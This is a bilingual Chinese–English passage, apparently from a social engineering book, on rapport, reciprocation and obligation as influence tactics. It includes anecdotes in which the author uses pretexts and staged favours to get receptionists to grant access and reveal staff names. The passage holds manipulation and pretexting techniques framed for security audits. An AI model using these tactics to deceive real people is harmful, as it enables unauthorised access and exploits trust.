Knowing what you want out of your engagements is an important aspect of influence and persuasion tactics. When you approach a target knowing what your goals are and what the indicators are that you are getting what you want, then you can clearly identify the path you need to take. Clearly defined goals can make or break the success of the influence tactics used by a social engineer as well as make the next step much easier to master.

 

融洽,融洽,融洽

Rapport, Rapport, Rapport

 

第 5 章专门讨论建立融洽关系。阅读、研究并完善您的建立融洽关系技能。

Chapter 5 has a whole section on rapport building. Read it, study it, and perfect your rapport-building skills.

 

建立融洽关系意味着你会吸引目标人物的注意力,并引起他的潜意识的注意,并在潜意识中建立信任。掌握建立融洽关系的技巧可以改变你与人打交道的方式,而当涉及到社会工程时,它可以改变你的整个方法。

Developing rapport means that you get the attention of the person you are targeting and his unconscious mind, and you build trust within that unconscious portion. Mastering the skill of building rapport can change the way you deal with people, and when it comes to social engineering, it can change your whole methodology.

 

要建立融洽关系,首先要了解你想要影响的人的心理状态——试着了解他们的心态。他们怀疑吗?他们是不安、悲伤还是担心?无论你认为他们处于哪种情绪状态,都要从那里开始。不要把注意力集中在你的目标上,而要把注意力集中在了解这个人上。这是非常重要的一点。这意味着社会工程师必须充分了解他的目标,这样他们才能有意识地想象他们在哪里。目标的想法和心理状态是什么?

To build rapport, start where the person you want to influence is mentally—try to understand their frame of mind. Are they suspicious? Are they upset, sad, or worried? Whatever emotional state you perceive them to be in, start from there. Do not focus on your goals as much as focusing on understanding the person. This is a very vital point. This means a social engineer must understand his target enough that they can imagine where they are consciously. What are the target’s thoughts and state of mind?

 

例如,假设你想劝说你的好朋友戒烟、戒毒或戒掉其他东西。注意,你不是想劝她戒烟,而是想说服她戒烟。你的目标不能是关于你自己,对吧?它必须专注于目标。你不能以她的瘾对你造成了什么影响、有多讨厌那种气味等来开始你的谈话。争论的焦点必须是这对有什么好处。你不能以言语攻击来开始谈话,说那个人的坏习惯对你造成了什么影响,但你需要了解那个人的心态,接受它,并与之保持一致。

For example, imagine you want to influence your dear friend to want to quit smoking or doing drugs or something else. Notice you don’t want to convince her to quit, but convince her to want to quit. Your goal cannot be about you, right? It must focus on the target. You can’t start your conversation with what her addiction is doing to you and how much you hate the smell, and so on. The argument has to be what is in it for her. You cannot start the conversation with a verbal attack about what the person has done to you with their habit, but you need to understand where that person’s frame of mind is, accept it, and come into alignment with it.

 

社会工程学也大同小异:你不能从自己的心理出发。这对很多人来说都是一场斗争。你知道她为什么吸烟吗?你了解她的心理、生理或精神原因吗?除非你能真正站在她的立场上,否则你就无法建立牢固的关系,你施加影响的努力也将失败。

Social engineering is much the same: you can’t start where you are mentally. This is going to be struggle for many people. Do you know why she smokes? Do you understand the psychological, physical, or mental reasons why? Until you can really get into her shoes, you cannot build a strong rapport and your efforts at influence will fail.

 

此外,你不能总是以逻辑为基础来建立融洽关系。我曾经在医院里照顾一位因喉癌而濒临死亡的好朋友。他吸烟 40 多年,有一天他发现自己得了癌症。癌症迅速扩散,他不得不在医院度过生命中的最后一天。他的孩子们会来看望他,时不时地离开房间。我以为他们情绪激动。有一次,在他们告辞后,我出去安慰他们,结果他们在医院外面抽烟!我惊呆了。我不抽烟,也不想抽烟,虽然我能理解烟瘾有多严重,但我不明白,在看到他们父亲的痛苦后,他们怎么能把香烟举到嘴边。

In addition, you cannot always base the idea of building rapport on logic. I once was in the hospital with a dear friend who was dying from throat cancer. He had smoked for more than 40 years and one day he found out he had cancer. It spread fast, bringing him to the hospital to live out his last days. His children would come to visit and every now and then they would leave the room. I thought they were overcome with emotion. One time after they excused themselves I went out to comfort them and they were outside the hospital smoking! I was dumbfounded. I don’t smoke and have no desire to, and although I can understand how strong an addiction can be, I couldn’t understand how after seeing the pain their father was in, how they could raise a cigarette to their lips.

 

在这种情况下,逻辑无法获胜。告诉我朋友的孩子吸烟有害以及吸烟会如何杀死他们不会有什么好处——这些信息毫无用处,因为它具有挑衅性,只会让我在说这些话时感觉良好,但不符合他们现在的心态。除非你了解对方,否则你无法成功地建立足够好的融洽关系来影响他或她。

Logic would not win in this case. Telling my friend’s children why smoking is bad and how it will kill them would do no good—this information was useless because it was combative and only made me feel good in saying it, but did not align with their present frame of mind. Until you understand the person you cannot successfully build a good enough rapport to influence him or her.

 

让某人愿意做某事需要情感和逻辑的结合,在很多情况下还需要理解和谦逊。有一次我走进一间办公室,准备去处理一些工作,却听到外面有人说了一句搞笑的话,所以当我走进大厅时,我咯咯地笑了起来。办公桌后面的那个女人一定做了什么尴尬的事,因为她一看到我,就立刻生气地对我大喊:“这可不怎么好笑,你是个混蛋。”

Getting someone to want to do something is a blend of emotion and logic, as well as understanding and humility in many cases. Once I walked into an office I was going to do some work for and I had heard a funny comment outside, so when I walked in the main lobby I was chuckling. The woman behind the desk must have just done something embarrassing because when she saw me she immediately got angry and yelled at me, “It’s not very funny and you are a jerk.”

 

现在我并不认识这个女人,说实话,我心里有一个目标,那就是这种互动不会有帮助。此外,她以为我在嘲笑她,并想反击她,这让我感到很受侮辱。但相反,我看到她很生气。我走近柜台,以免再让她难堪,我看着她的眼睛,真诚地说:“如果你认为我在嘲笑你,我很抱歉。我在停车场,你的一些同事正在讲述周末聚会的故事,我觉得很有趣。”

Now I didn’t know this woman and to tell you the truth I had a goal in mind that this interaction was not going to help. In addition, I felt insulted that she assumed I was laughing at her, and wanted to lash back at her. But instead, I saw she was upset. I got close to the counter so as not to embarrass her anymore, I looked her in the eye, and with sincerity said, “I am so sorry if you thought I was laughing at you. I was in the parking lot and some of your workmates were telling a story about a party over the weekend and I thought it was very funny.”

 

她看着我,我看得出她现在更加尴尬了,为了给她留面子,我大声说:“女士,我很抱歉笑了你,让你难堪了。”这让她在我们周围的人面前保住了面子。她明白我“为了团队牺牲了一切”,所以她以极其友善的态度回应了她。一分钟后,她道了歉,这对我有利,因为我得到了我要求的所有数据,而这些数据我通常要费很大力气才能得到。

She looked at me and I could tell she was now even more embarrassed, so to save face for her, I loudly said, “Ma’am, I am sorry for laughing and embarrassing you.” This allowed her to save face to those around us. She understood that I “took one for the team” and she responded with extreme kindness. A minute later she apologized and it worked to my benefit as I was given all the data I asked for, data I normally would have had to work very hard to get.

 

我曾经的一位老师告诉我要“以善意打动他人”。这句话很有说服力。善待他人是建立融洽关系和确立说服和影响的五个基本原则的快速方法。

A teacher I had once used to tell me to “kill them with kindness.” That is a pretty powerful statement. Being kind to people is a quick way to build rapport and to establish yourself in the five fundamentals of persuasion and influence.

 

用善意和融洽关系影响他人的一种方法是提出问题并给出选择,引导他们走上你想要的道路。例如,有一次我被影响,作为团队努力的一部分,接受了一份我并不真正想要的工作。团队领导很有魅力,很友好,有“魅力因素”,可以和任何人交谈。他走近我说:“克里斯,我想和你单独谈谈。我需要一个得力助手来完成一个小项目。但这个人需要是一个有进取心、自我激励的人。我想这就是你,但我不想假设;你觉得呢?”

One method to influence people using kindness and rapport is to ask questions and give choices that lead them to a path you want. For example, once I was influenced to take a job I really didn’t want as part of a team effort. The team leader was very charismatic and friendly and had the “charm factor” that allowed him to speak to anyone. He approached me and said, “Chris, I wanted to talk to you separately from the team. I need a right hand for a small project. But the person needs to be a go-getter, self motivated. I think this is you, but I don’t want to assume; what do you think?”

 

听到这些赞美,我感到很兴奋,也很荣幸,因为我有可能成为“重要人物”,所以我回答说:“我是一个非常有上进心的人。无论你需要什么,都可以告诉我。”

I was excited and flattered by the compliments and the potential to be “important,” so I responded, “I am a very self-motivated person. Whatever you need, tell me.”

 

团队领导继续说道:“嗯,我非常相信以身作则。我认为你具备这种领导素质。问题是,团队中有些人不具备这种素质,他们需要一个强者来向他们展示如何做到这一点。”

The team leader continued, “Well, I am a big believer in leading by example. And I think you have that leadership quality. The problem is, some on the team do not, and they need a strong person to show them how it is done.”

 

对话还没结束,他想要的似乎就是我的主意,让人无法反驳。确实很强大,一切都始于说服力。

Before the end of the conversation, what he wanted appeared as if it was my idea, which made it impossible to back out of. Powerful indeed, and all started with the power of persuasion.

 

与自己和周围环境保持一致

Be in Tune with Yourself and Your Surroundings

 

了解自己和周围环境,或感觉敏锐度,是指能够注意到目标人和自己的迹象,这些迹象会告诉您是否朝着正确的方向前进。

Being aware of yourself and your surroundings, or sensory acuity, is the ability to notice the signs in the person you are targeting and yourself that will tell you that you are moving in the right direction or not.

 

上一章讨论的许多原则都适用于说服。解读肢体语言和面部表情可以让你了解自己对他人的影响。

Many of the principles discussed in the previous chapter apply to persuasion. Reading body language and facial signs can tell you much about your influence on the person.

 

要真正掌握影响和说服的双重艺术,你必须成为观察大师和倾听大师。加拿大阿尔伯塔大学的认知神经心理学家克里斯·韦斯特伯里估计,人类大脑每秒处理信息的速度为 2000 万亿次。这些计算表现为面部表情、微表情、手势、姿势、语调、眨眼、呼吸频率、说话方式、非语言表达以及许多其他类型的区分模式。掌握影响力意味着要意识到自己和他人身上的这些微妙之处。

To really master the dual art of influence and persuasion, you have to become a master watcher and master listener. Chris Westbury, a cognitive neuropsychologist at the University of Alberta, Canada, estimates that human brains process information at 20 million billion calculations per second. Those calculations are represented by facial expressions, microexpressions, gestures, posture, voice tones, eye blinks, breathing rate, speech patterns, nonverbal utterances, and many more types of distinguishing patterns. Mastering influence means to be aware of those subtle things in yourself and others.

 

我发现,在接受了艾克曼博士关于微表情的培训后,我的观察能力变得更容易了。后来我发现,我不仅更加了解周围的人,也更加了解自己。当我感觉到脸上的某种表情时,我能够分析它,看看它会如何表现给别人。这种对自己和周围环境的认识是我一生中最有启发性的经历之一。

I found, for myself, the ability to be observant proved to be easier for me after receiving some training from Dr. Ekman in microexpressions. I found afterward that not only did I become much more aware of what was going on with those around me, but also myself. When I felt a certain expression on my face, I was able to analyze it and see how it might be portrayed to others. This recognition of myself and my surroundings was one of the most enlightening experiences of my life.

 

NLP 专家提倡在试图影响他人时尽量减少内心对话。如果你在接近目标时考虑攻击的下一阶段、最终目标或对潜在对话终结者的反击,那么这种内心对话可能会让你错过很多周围发生的事情。观察力需要付出很多努力,但回报是值得的。

NLP experts promote minimizing your internal dialog when trying to influence others. If you approach the target thinking about the next stage of the attack, the end goal, or comebacks for potential conversation stoppers, that internal dialog can cause you to miss a lot of what is going on around you. Being observant takes a lot of work but the payoff is well worth it.

 

不要疯狂行事——要灵活

Don’t Act Insane—Be Flexible

 

我所说的不疯狂和灵活是什么意思?多年来一直流传的疯狂的一个定义是“一遍又一遍地做同样的事情,却期待不同的结果。”愿意并能够灵活变通是说服的关键之一。

What do I mean by not acting insane and being flexible? One definition of insanity that’s been floating around for years is “doing the same thing over and over and expecting different results.” Being willing and able to flex is one of the keys to persuasion.

 

你可以从物理角度来思考这种灵活性。如果你被要求说服或弯曲某样东西,你宁愿选择柳树枝还是钢棒?大多数人会选择柳树枝,因为它灵活,更容易弯曲,而且可以让任务更容易完成。如果自己不屈不挠,试图说服别人是行不通的,如果你不灵活,说服别人也是行不通的。

You can think of this flexibility in terms of physical things. If you were tasked to persuade or bend something, would you rather it be a branch from a willow tree or a steel rod? Most people would say the willow branch because it is flexible, easier to bend, and makes the task accomplishable. Trying to persuade others while being unyielding and inflexible doesn’t work, and neither does persuasion if you are not flexible.

 

很多时候,审计不会按计划进行。优秀的社会工程师能够随机应变,根据需要调整目标和方法。这并不违背提前规划的理念;相反,它表明不要太死板,当事情没有按计划进行时,你可以采取行动和适应,这样目标就不会丢失。

Many times, an audit will not go as planned. A good social engineer will be able to roll with the punches and adjust their goals and methods as needed. This does not go against the idea of planning ahead; instead, it bespeaks the point of not being so rigid that when things do not go as planned you can move and adapt so the goal is not lost.

 

一个人看待疯子的方式与目标看待不屈不挠的社会工程师的方式是一样的。社会工程师看起来不可理喻,你很可能永远无法到达终点。

The way a person would view an insane person is the way a target would view the inflexible social engineer. The social engineer would look unreasonable and you would most likely never reach endgame.

 

与自己取得联系

Get in Touch with Yourself

 

通过与自己保持联系,我并不是建议你进行某种禅修,只是让你了解自己的情绪。情绪几乎控制着你所做的一切,以及你的目标所做的一切。了解你的情绪并与自己保持联系可以帮助你为成为一名有效的社会工程师奠定基础。

By getting in touch with yourself, I am not suggesting some Zen meditation avenue, just that you understand your emotions. Emotions control practically everything you do, as well as everything your target does. Knowing your emotions and being in touch with yourself can help you lay the groundwork for being an effective social engineer.

 

回到之前你和你吸烟朋友的例子——如果你对吸烟者怀有根深蒂固的仇恨,那么接近你的朋友会影响你的方法。它会让你的行为、表达、说或做一些事情,从而关闭说服之门。你可能永远不会在某些事情上妥协,意识到这些事情和你对它们的情绪可以帮助你制定一条影响目标的清晰途径。

Going back to the earlier example of you and your smoking friend—approaching your friend if you have a deep-seated hatred for those who smoke affects your approach. It can make you act, express, say, or do something that will close the door to persuasion. You may never compromise on certain things, and being aware of those things and your emotions about them can help you to develop a clear path toward influencing a target.

 

这五个基本原则是理解影响力和说服力的关键。能够创造一个让目标愿意按照你的要求去做的环境是说服的目标,这五个基本原则将帮助你创造这样的环境。下一节将探讨社会工程师如何使用这些基本原则。

These five fundamentals are key to understanding influence and persuasion. Being able to create an environment where a target wants to do what you are requesting is the goal of persuasion, and these five fundamentals will help you create that environment. The next section examines how social engineers use these fundamentals.

 

影响策略

Influence Tactics

 

如上所述,社会工程师必须不断练习说服技巧,直到它成为他们日常习惯的一部分。这并不意味着他们必须在所做的每件事上影响每个人,但能够随意开启或关闭这项技能是优秀社会工程师的一大特质。

As mentioned, social engineers must practice the skill of persuasion until it becomes part of their everyday habits. This doesn’t mean that they must influence everyone in everything they do, but being able to turn this skill on and off at will is a powerful trait of a good social engineer.

 

影响力和说服力有许多方面可供您使用,其中许多方面很容易融入审计中。其他方面可能不太容易融入,但在影响力领域中却占有非常重要的地位。以下部分涵盖了媒体、政客、政府、骗子、诈骗犯,当然还有社会工程师经常使用的八种不同的影响力技巧。

Influence and persuasion have many aspects you can use and many that fit easily into an audit. Other aspects might not fit too easily, but hold a very powerful position in the world of influence. The following sections cover eight different techniques of influence that are used often by media, politicians, government, con men, scammers, and of course, social engineers.

 

每个部分都对每种技术进行了分析,以了解它如何在社会工程学之外的其他影响领域中使用,并仔细研究它如何应用于社会工程师。

Each section provides an analysis of each technique to see how it is used in other areas of influence besides social engineering, as well as takes a closer look at how it can apply to a social engineer.

 

往复

Reciprocation

 

互惠是一种内在的期望,即当别人善待你时,你也会以同样的方式回报。一个简单的例子是,当你走进一栋建筑时——如果有人为你开门,他希望你说谢谢,然后确保他进来时隔壁的门为他敞开。

Reciprocity is the inherent expectation that when others treat you well you respond in kind. A simple example is when you are walking into a building—if someone holds a door open for you, he expects you to say thank you and then make sure that next door stays open for him as he comes in.

 

互惠原则很重要,因为回报的恩惠往往是无意识的。了解这一点意味着你现在可以更进一步了解如何将其用作社交工程师。不过,在开始之前,以下是一些经常使用互惠原则的例子:

The rule of reciprocity is important because often the returned favor is done unconsciously. Knowing this means that you now have a step up on how you can use it as a social engineer. Before getting into that, though, here are a few examples where reciprocity is often used:

 
 
     
  • 制药公司会为每位医生(是的,每位医生)花费 10,000 至 15,000 美元购买“礼物”,这些礼物可能包括晚餐、书籍、电脑、帽子、衣服或其他带有制药公司徽标的物品。当需要选择支持和购买的药物时,您认为医生更有可能选择谁?
  • Pharmaceutical companies will spend $10,000–$15,000 per doctor (yes, per doctor) on “gifts” that might include dinners, books, computers, hats, clothing, or other items that have the drug company’s logo on it. When the time comes to choose a drug to support and buy, to whom do you think the doctors are more likely to go?
  •  
     
  • 政客们也受到同样的影响。众所周知,政客或说客们往往对那些帮助他们竞选的人比那些没有帮助他们竞选的人更为友好。
  • Politicians are influenced in much the same way. It is no secret that many times politicians or lobbyists are more favorable to people who helped their political campaign than those who did not.
  •  
     
  • 互惠在商业中很常见,尤其是在合同方面。也许销售人员会支付一顿饭的费用,然后要求在合同中做出让步。客户被迫做出让步。
  • Reciprocity is often used in business, especially when it comes to matters of contracts. Maybe the sales guy will pay for a meal, then later on ask for a concession in the contract. The client is compelled to give this concession.
  •  
     
  • 有一周你需要休息一天,一位同事替你补了一天假。现在她要求你回报她,但你还有事要做。在这种情况下,人们会重新安排时间并满足你的要求。
  • A fellow employee filled in for you one week when you needed a day off. Now she asks you to return the favor, but you have plans. In this situation, people will reschedule and honor the request.
  •  
 

这些都是互惠的例子。社会学家 Alvin Gouldner 写了一篇名为“互惠规范”的论文(http://media.pfeiffer.edu/lridener/courses/normrecp.html),他在论文中指出:

All of these are examples of reciprocity. Sociologist Alvin Gouldner wrote a paper called, “The Norm of Reciprocity” (http://media.pfeiffer.edu/lridener/courses/normrecp.html) in which he states:

 

具体而言,我认为互惠规范的普遍形式有两个相互关联的最低要求:(1)人们应该帮助那些帮助过他们的人,(2)人们不应该伤害那些帮助过他们的人。一般来说,互惠规范可以被认为是所有价值体系中的一个维度,特别是道德准则中普遍存在的许多“主要成分”之一。

Specifically, I suggest that a norm of reciprocity, in its universal form, makes two interrelated, minimal demands: (1) people should help those who have helped them, and (2) people should not injure those who have helped them. Generically, the norm of reciprocity may be conceived of as a dimension to be found in all value systems and, in particular as one among a number of “Principal Components” universally present in moral codes.

 

基本上,他的研究让他认识到,无论文化背景如何,互惠都是有效的。在适当的情况下,互惠几乎是无法抗拒的。

Basically, his research led him to see that reciprocity works despite cultural backgrounds. Reciprocity, used under the right circumstances, is all but impossible to resist.

 

将互惠视为图 6-1所示的过程。

Think of reciprocity as the process shown in Figure 6-1.

 

图 6-1:互惠循环。

Figure 6-1: The cycle of reciprocity.

 
f0601.eps
 

以下部分将详细阐述上述想法的一些关键点。

The following sections expand on some key points of the preceding idea.

 

赠送一些东西

Give Something Away

 

你赠送的东西不能是一些简单的垃圾。赠送的东西必须对接受者有价值。赠送一本用接受者不读或不收藏的语言编写的精美精装小说是没有意义的。

The thing you give away can’t be some simple piece of junk. The thing given must have value—to the recipient. Giving away a beautiful hardcover novel written in a language the recipient does not read or collect is useless.

 

赠品可以是一项服务、一件实物、一些有价值的信息、帮助或其他任何接收者认为有价值的东西(甚至可以是像扶门或捡起掉落的东西这样简单的事情)。一些销售机构提倡这种方法,但却因提供没有价值的物品而功亏一篑。想象一下你在一个贸易展览会上,每张桌子上都有赠品。如果你走到一张桌子前,注意到一堆看起来很便宜的笔,你可能会直接走过去。隔壁桌子上有一个有趣的益智游戏。你很感兴趣,于是拿起它;你玩了几分钟后,一个销售人员走过来问:“你想要提示吗?”给你一点提示后,他会问你是否有时间,这样他可以向你展示一项你可能会非常喜欢的服务。

The item can be a service, a physical item, some valuable information, assistance, or anything else that the receiver will deem as a value (even something as simple as holding the door or picking up something dropped). Some sales organizations promote this method but then fall short by offering something that has no value. Imagine you are at a trade show and at each table is a giveaway. If you walk up to a table and notice a pile of cheap-looking pens you might just walk by. The next table has an interesting puzzle-like game. You are intrigued so you pick it up; after you spend a few minutes playing with it a salesperson approaches and says, “You want a hint?” After showing you a small hint he asks whether you have a minute so he can show you a service you might really love.

 

你怎能拒绝呢?你得到了一个有趣的游戏和一个免费的提示,而现在他想要的只是你一分钟的时间?这是一个完美的安排。

How can you say no? You get an intriguing game and a free hint, and now all he wants is a minute of your time? It’s a perfect setup.

 

创造感激之情

Create Indebted Feelings

 

礼物对于收礼人来说越有价值、越出乎意料,收礼人的亏欠感就越强烈。

The more value the gift has to the recipient and the more unexpected it is, the greater the sense of indebtedness.

 

不要让礼物成为明显的操纵手段,这一点很重要。不要说或表现得像“我给了你一份很棒的礼物,现在你欠我了。”即使这样想也可以消除任何亏欠感。“礼物”应该是完全免费的,并且对接受者来说很有价值。

Not allowing the gift to be used in an obvious manipulation tactic is important. Don’t say or act like, “I gave you this great gift now you owe me.” Even thinking it can take away any feelings of indebtedness. The “gift” should be totally free and of great value to the recipient.

 

例如,美国人道协会免费赠送个性化邮寄标签。没有任何附加条件,许多人用它们来制作节日贺卡或私人信件。它们外观精美,质量上乘。您注册后,几个月后就会接到电话,要求您捐款以支持当地的人道协会。受助人的责任感通常非常强烈,以至于不会不捐出哪怕一点点。

The Humane Society of the United States, for instance, gives away personalized mailing labels as a free gift. No strings are attached and many people use them for holiday cards or personal letters. They are attractive and good quality. You sign up for them, and many months later you will get a call asking for a donation to support your local Humane Society. The recipient’s sense of obligation is usually too great to not contribute even a little.

 

再比如,《财富》杂志免费向大学教授提供杂志,让他们无任何附加条件地在课堂上试读。

By way of another example, Fortune Magazine offers college professors free issues of its magazine to try out in their classes with no strings attached at all.

 

像这样的互惠例子还有很多。另一方面,许多公司却没有做到互惠,因为他们认为下面这些礼物是很好的礼物:

Many examples of reciprocity like these exist. On the flip side, many companies fail at reciprocity by thinking things like the following are good gifts:

 
 
     
  • 外观精美、色彩丰富的企业宣传册
  • Sharp-looking and colorful corporate brochures
  •  
     
  • 无用且破烂的玩具
  • Useless and junky toys
  •  
     
  • 有关您的产品或公司的销售资料
  • Sales literature about your products or company
  •  
 

这些东西不会让人产生感激之情。接受者必须认为“礼物”很有价值。另一个可以让人产生真正感激之情的“礼物”来源是信息。对某些人来说,提供有价值、有益或有用的信息实际上比实物礼物更有趣。

These things do not build indebtedness. The recipient must deem the “gift” valuable. Another source of “gifts” that can build true indebtedness is information. Giving away a valuable, beneficial, or useful piece of information can literally be of more interest than a physical gift to some.

 

提出你想要的

Ask for What You Want

 

有一次,当我走进一栋大楼时,我看到一个看起来很像“老板”的男人从停在标有“仅限首席财务官”标志的车里走出来,正在打电话。他心情很不好,我无意中听到他告诉别人,他很不高兴,因为他必须进去让一些人离开。从他的语气中,我猜想他和他的妻子或女朋友在一起,他不喜欢他即将要做的工作。

On one occasion as I was entering a building, I saw a man who looked very much to be the “boss” get out of his car parked in the spot marked “For CFO Only,” and he was on his cell phone. He was not a happy guy, and I overheard him telling someone that he was upset because he had to go inside and let some people go. I assumed from his tone that he was on with his wife or girlfriend and he didn’t like the job he was about to do.

 

我从他身边走过,走到前台,走上前去,看到前台后面的女孩正在玩扫雷游戏。当我走近柜台时,她对我说了一句标准的话:“我能为您做些什么?”她脸上的表情表明她很无聊,心情不好。我说:“听着,我来这里开会,但你的老板就要进来了,他心情不好……”然后我停了下来,手里拿着一个文件夹站在那里。几秒钟后,老板气冲冲地从前门进来,我大声说:“非常感谢您的帮助。”

I walked past him and went to the front desk and as I walked up I saw that the girl behind the desk was playing Minesweeper. As I approached the counter she gave me the standard, “How can I help you?” She had a look on her face that said she was bored and not in the mood. I said, “Look, I am here for a meeting, but your boss is about to walk in and he is in a bad mood…” I then trailed off and just stood there with a folder in my hand. A few seconds later the boss stormed in the front door and I said loudly, “Thank you so much for your assistance.”

 

她看了一眼,对我说:“对不起,先生”,然后对她的老板说:“早上好,史密斯先生,我有您的留言”,然后在他走过时递给他一小叠纸。

She looked over and said to me, “Excuse me, sir,” then said to her boss, “Good morning, Mr. Smith, I have your messages,” and then handed him a small pile of paper as he walked by.

 

当他消失在办公室时,她对我连声道谢。我救了她,她知道这一点。我给她的信息非常宝贵,我接下来的话是命令性的:“我需要你的帮助。我想见人力资源经理,只是开个简短的会议。你能让我快点进她的办公室吗?”

When he disappeared to his office she thanked me profusely. I just saved her and she knew it. The information I gave her was invaluable, and my next words would be imperative: “I need your help. I wanted to see the HR manager just for a brief meeting. Can you get me into her office real quick?”

 

她送我回经理办公室,并介绍我是来访的“她的朋友”。几分钟后,我的计划就启动了,这一切都要归功于互惠互利。

She walked me back to the manager’s office and introduced me as “her friend” that stopped in. Within minutes my plan was launched, and all thanks to reciprocity.

 

作为一名社会工程师,寻找一些小机会来提供信息,这些信息将使你对接收者有价值,更重要的是,让接收者感激你。

As a social engineer, look for little opportunities to give out information that will make you valuable to the recipient and more importantly, make the recipient indebted to you.

 

注意周围环境,注意你能做哪些小事让你的目标感激你。记住,这不一定非得是了不起的事情,只要是他们重视的事情就行。要记住的一点是不要“跟踪”目标。站着盯着他或她,等待机会做某事或说某事可能会让人反感。这些原则应该是自然的。

Be aware of your surroundings and what little things you can do to make your targets indebted to you. Remember it doesn’t have to be something amazing, just something that they value. A good point to keep in mind is to not “stalk” the target. Standing and staring at him or her waiting for an opportunity to do or say something can be off-putting. These principles should be natural.

 

自然意味着您开始在日常生活中践行这些原则。为他人开门,彬彬有礼,寻找机会为他人做好事。这些行为将成为您的第二天性,您在审计中做这些事情时会遇到更少的困难。

Naturalness means you start doing these principles in everyday life. Hold doors for people, be very polite, and look for opportunities to do good things for others. These actions will become second nature and you will have fewer struggles doing them in an audit.

 

互惠是一种强大的影响策略,接下来讨论的两个原则与它密切相关。

Reciprocity is a powerful influence tactic, and the next two principles discussed are closely tied into it.

 

义务

Obligation

 

义务与一个人认为自己需要采取的行动有关,因为某种社会、法律或道德要求、责任、合同或承诺。在社会工程学的背景下,义务与回报密切相关,但不限于回报。义务可以简单到为某人扶着外门,这通常会让他为你扶着内门。它可以升级为某人向你提供私人信息,因为你让他们对你产生了一种义务感。义务是针对客户服务人员时使用的常见攻击媒介。

Obligation has to do with actions one feels he needs to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. In the context of social engineering, obligation is closely related to reciprocation but is not limited to it. Obligation can be as simple as holding an outer door for someone, which will usually make him hold the inner door for you. It can be escalated to someone giving you private info because you create in them a sense of obligation to you. Obligation is a common attack vector used when targeting customer service people.

 

您还可以通过巧妙的赞美来小剂量地使用义务。例如,赞美对方,然后提出要求。如果您是新手或缺乏经验,这种技巧很容易出错,而且会显得非常虚伪,以至于会惊动目标的内心并产生错误的效果。但如果做得正确,它可以导致获得哪怕是一点点有价值的信息。

You can also use obligation in small doses by utilizing smart complimenting. For example, compliment the person, then follow it up with a request. This technique is very easy to do wrong if you are new or inexperienced and can come across so fake that it alerts the target’s inner sense and has the wrong effect. But if done properly, it can lead to obtaining even little pieces of valuable information.

 

错误赞美的例子包括:“哇,你的眼睛真漂亮,我可以进你的服务器机房吗?”听起来很蠢,对吧?一定要大声说出你的方法,看看听起来怎么样。如果听起来像一句低俗的搭讪台词,那就必须放弃。

An example of complimenting in the wrong way would be something like, “Wow, you have beautiful eyes, can I get into your server room?” Sounds stupid, huh? Be sure to say your method out loud to see how it sounds. If it sounds like a cheap pickup line then it has to go.

 

另一方面,像这样的小对话可以成为一种适当的赞美方式:

A small conversation like this, on the other hand, can be a proper way to compliment:

 

当你走近接待员的桌子时,你看到了迪斯尼乐园里几张小孩的照片,自我介绍后,你说:“那是你的孩子吗?他们真可爱。”不管他们是接待员的孩子还是她的侄子,她很可能会喜欢你的称赞。然后你接着说:“我自己也有几个孩子。他们让我们保持年轻,是吧?”

As you approach the receptionist’s desk you see some pictures of a couple of little children at Disney World and after you introduce yourself you say, “Are those your kids? They sure are cute.” Regardless if they are the receptionist’s kids or her nephews, she will most likely enjoy your compliment. Then you follow up with, “I have a couple of my own. They keep us young, huh?”

 

“是的,我的两个孩子。我不确定他们是否年轻,”她笑着说,“但他们确实让我很累。”

“Yes, my two kids. And I am not sure about young,” she chuckles, “but they do tire me out.”

 

“我还没带我的孩子去迪士尼呢,”我说。“你觉得他们那个年龄的孩子喜欢迪士尼吗?”

“I haven’t taken mine to Disney yet,” I say. “Did you find they enjoyed it at that age?”

 

“哦,是的,他们喜欢这里的每一秒,”接待员说。“只要我女儿和她爸爸在一起,她就会玩得很开心。”

“Oh yeah, they loved every second of it,” says the receptionist. “As long as my daughter is with her Daddy, she is having fun.”

 

“啊,是的,我也有我的小公主,”我回答道。“好吧,我可以站在这里整天谈论我的孩子,但我想知道你是否能帮我。上周我打电话和某人谈了一个新的人力资源软件包,我说我会把这个信息包交给她,但我把写着她名字的纸弄丢了。我非常尴尬。”

“Ah, yeah, I have my little princess too,” I reply. “Well, I could stand here and talk about my kids all day, but I am wondering if you can help me out. I called in and spoke to someone last week about a new HR software package and I said I would drop off this information packet, but I lost the paper I wrote her name on. I am terribly embarrassed.”

 

“哦,那可能是史密斯夫人,”接待员说道。“她负责处理所有事情。”

“Oh, that’s probably Mrs. Smith,” offers the receptionist. “She handles all of that.”

 

“你救了我一命。我欠你一个人情。谢谢你。”

“You are a life saver. I owe you one. Thank you.”

 

这些类型的赞美对于让目标对象更愿意接受影响有很大帮助。

These types of compliments go a long way to opening the target up to be more agreeable to influence.

 

黄金法则——己所不欲,勿施于人——是培养责任感的关键原则。善待他人,给予他们可能需要的东西,即使只是一句赞美,也能让他们对你产生责任感。

The golden rule—treat others as you would wish to be treated—is a key principle in creating obligation. Treating people kindly and giving them something they may need, even if it is as small as a compliment, can create a sense of obligation to you.

 

心理学家史蒂夫·布雷塞特在他的文章《说服和如何影响他人》中提出了这一点,他在文中指出,“根据美国残疾退伍军人组织的说法,邮寄简单的捐款呼吁成功率为 18%。附上一份小礼物,如个性化地址标签,成功率几乎翻倍至 35%。‘既然你给我寄了一些有用的地址标签,我会给你寄一点捐款。’”

Psychologist Steve Bressert makes this point in his article “Persuasion and How To Influence Others,” in which he states, “according to the American Disabled Veterans organization, mailing out a simple appeal for donations produces an 18% success rate. Enclosing a small gift, such as personalized address labels, nearly doubles the success rate to 35%. ‘Since you sent me some useful address labels, I’ll send you a small donation in return.’”

 

如果你想向自己证明这一原则的力量,那就试试这个简单的练习吧。即使是像问题这样小的事情也能产生责任感。下次有人问你问题时,什么也别说。保持沉默或忽略它,继续谈话。注意这有多尴尬;像问题这样简单的事情会让人产生回答的责任感。简单地向目标问一个问题就能带来惊人的结果。

If you want to prove to yourself the power of this principle try this simple exercise. Even something as small as a question can create obligation. The next time someone asks you a question, say nothing. Just stay silent or ignore it and move on in the conversation. Notice how awkward that is; something as simple as a question creates a sense of obligation to answer. Simply asking the target a question can lead to amazing results.

 

如果你的第一次行动让人们感觉到会有后续行动,那么满足这种期望会让他们产生强烈的责任感。当你与人交往时,对方期待结果,那么满足结果会让对方产生强烈的责任感,从而为你做同样的事情。

If your first action creates a feeling that there is an expected follow-up, then fulfilling that expectation can lead to strong feelings of obligation. When the person with whom you are interacting expects a result, fulfilling it can create a strong sense of commitment in him or her to do the same for you.

 

